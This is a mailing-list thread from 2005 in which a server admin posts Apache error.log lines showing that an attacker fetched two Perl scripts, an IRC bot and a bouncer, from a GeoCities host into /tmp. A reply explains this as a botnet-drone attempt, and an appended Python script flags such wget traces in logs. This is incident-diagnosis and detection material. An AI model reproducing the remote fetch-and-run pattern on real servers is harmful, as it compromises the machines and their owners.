Security Basics mailing list archives
Re: Strange found in apache error.log
From: "Security" <security () yakboy org>
Date: Mon, 5 Dec 2005 18:07:03 -0000
BNC is a bouncer for connecting to IRC with ... and the bot9 is probably a bot script for the above ... looks like someone tried to set your system into a drone for a botnet.

----- Original Message -----
From: <kc () mikrobit pl>
To: <security-basics () securityfocus com>
Sent: Sunday, December 04, 2005 12:39 AM
Subject: Strange found in apache error.log

Hi

I found something like this in my apache error.log

[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:32:30 2005] [error] [client 218.156.221.22] client denied by server configuration: /virtual/mikrobit/_http/
[Sat Dec 03 00:34:10 2005] [error] [client 81.219.172.109] client denied by server configuration: /virtual/mikrobit/_http/
--00:42:14-- http://www.geocities.com/ikanlagasiam/bot9.txt
=> `bot9.txt'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,552 (19K) [text/plain]
0K .......... ......... 100% 46.0K
00:42:15 (45.94 KB/s) - `bot9.txt' saved [19552/19552]
--00:42:15-- http://www.geocities.com/ikanlagasiam/bnc.txt
=> `bnc.txt'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,090 (21K) [text/plain]
0K .......... .......... 100% 48.8K
00:42:16 (48.78 KB/s) - `bnc.txt' saved [21090/21090]
--00:42:16-- http://bot9.txt.*/
=> `index.html'
Resolving bot9.txt.*... failed: Unknown host.

And when I look in /tmp I found those 2 perl scripts: bot9.txt and bnc.txt

After that I look here #ps ax and I found 2 alien processes ..

How could they get and run those scripts ??

I use
Apache: 2.0.54-r7
mod_php: 4.4.0-r1
OS: gentoo 2005.1
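Programs started by the web server (a CGI script, or a command run from mod_php) inherit its stderr, which is why wget's transfer output sits between ordinary entries in the error.log quoted above. The following is an added example, not part of the original posts: a small scanner that flags such foreign lines and lists what was fetched; the function name and the line layout of the sample are assumptions.

```python
import re

# Apache 2.0 error-log entries start with "[Day Mon DD HH:MM:SS YYYY] [level]".
APACHE_ENTRY = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d{2}:\d{2}:\d{2} \d{4}\] \[\w+\]")
# wget 1.x request header as it appears in the post: "--HH:MM:SS--  URL"
WGET_START = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)")
# wget completion line: "HH:MM:SS (rate) - `file' saved [got/expected]"
WGET_SAVED = re.compile(r"^\d{2}:\d{2}:\d{2} \(.*?\) - `([^']+)' saved \[(\d+)/\d+\]")

def find_wget_transfers(lines):
    """Return (transfers, stray): wget requests found, and count of non-Apache lines."""
    transfers, stray, current = [], 0, None
    for raw in lines:
        line = raw.strip()
        if not line or APACHE_ENTRY.match(line):
            continue  # blank line or a normal Apache entry
        stray += 1    # anything else was written by some other process
        start = WGET_START.match(line)
        if start:
            current = {"time": start.group(1), "url": start.group(2),
                       "saved_as": None, "bytes": None}
            transfers.append(current)
            continue
        saved = WGET_SAVED.match(line)
        if saved and current is not None:
            current["saved_as"] = saved.group(1)
            current["bytes"] = int(saved.group(2))
    return transfers, stray

# Sample input: lines taken from the post above, with line breaks restored
# (the exact line layout is an assumption).
SAMPLE = """\
[Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes
[Sat Dec 03 00:34:10 2005] [error] [client 81.219.172.109] client denied by server configuration: /virtual/mikrobit/_http/
--00:42:14--  http://www.geocities.com/ikanlagasiam/bot9.txt
           => `bot9.txt'
Resolving www.geocities.com... 66.218.77.68
00:42:15 (45.94 KB/s) - `bot9.txt' saved [19552/19552]
--00:42:16--  http://bot9.txt.*/
Resolving bot9.txt.*... failed: Unknown host.
"""

if __name__ == "__main__":
    found, stray = find_wget_transfers(SAMPLE.splitlines())
    print(f"{stray} line(s) in the log were not written by Apache")
    for t in found:
        print(t["time"], t["url"], "->", t["saved_as"] or "not saved", t["bytes"])
```

A transfer with no `saved_as` value, like the last one in the sample, is a request that never completed.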